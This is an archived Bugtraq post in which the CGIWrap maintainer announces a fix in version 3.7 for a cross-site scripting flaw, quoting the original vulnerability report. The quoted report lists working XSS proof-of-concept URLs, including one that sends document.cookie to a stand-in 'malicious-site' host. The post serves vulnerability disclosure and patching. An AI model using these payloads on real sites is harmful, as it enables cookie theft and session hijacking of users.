Bugtraq mailing list archives

Re: [cgiwrap-users] Re: Security hole in CGIWrap (cross-site scripting vulnerability)

From: Nathan Neulinger <nneul () umr edu>
Date: Sun, 22 Jul 2001 12:39:03 -0500

The following cross-site scripting vulnerability was reported in
cgiwrap. This has just been corrected in version 3.7 which has just been
released.

http://prdownloads.sourceforge.net/cgiwrap/cgiwrap-3.7.tar.gz

All error message output is now html encoded to prevent this problem.

-- Nathan

"TAKAGI, Hiromitsu" wrote:


Hi,

I found a cross-site scripting vulnerability in CGIWrap.  Cookies
issued by the server on which CGIWrap is installed can be stolen.

Please try to access the following URLs.

Confirming the bug:
  http://www.unixtools.org/cgi-bin/cgiwrap/%3CS%3E
  http://www.unixtools.org/cgi-bin/cgiwrap/<S>
  http://www.unixtools.org/cgi-bin/cgiwrap/~nneul/<S>TEST</S>
JavaScript code will be executed:
  http://www.unixtools.org/cgi-bin/cgiwrap/~nneul/<SCRIPT>alert(document.domain)</SCRIPT>
  http://www.unixtools.org/cgi-bin/cgiwrap/~nneul/<SCRIPT>document.write(document.domain)</SCRIPT>
  http://www.unixtools.org/cgi-bin/cgiwrap/<IMG%20SRC=javascript:alert(document.domain)>
Stealing your Cookies issued by www.unixtools.org, if any:
  
http://www.unixtools.org/cgi-bin/cgiwrap/~nneul/<SCRIPT>window.open("http://malicious-site/save.cgi%3F"+escape(document.cookie))</SCRIPT>

<snip>


Regards,
--
Hiromitsu Takagi, Ph.D.
National Institute of Advanced Industrial Science and Technology,
Tsukuba Central 2, 1-1-1, Umezono, Tsukuba, Ibaraki 305-8568, Japan
http://www.etl.go.jp/~takagi/


_______________________________________________
cgiwrap-users mailing list
cgiwrap-users () lists sourceforge net
http://lists.sourceforge.net/lists/listinfo/cgiwrap-users


-- 


------------------------------------------------------------
Nathan Neulinger                       EMail:  nneul () umr edu
University of Missouri - Rolla         Phone: (573) 341-4841
CIS - Systems Programming                Fax: (573) 341-4216

Current thread:

Re: [cgiwrap-users] Re: Security hole in CGIWrap (cross-site scripting vulnerability) Nathan Neulinger (Jul 23)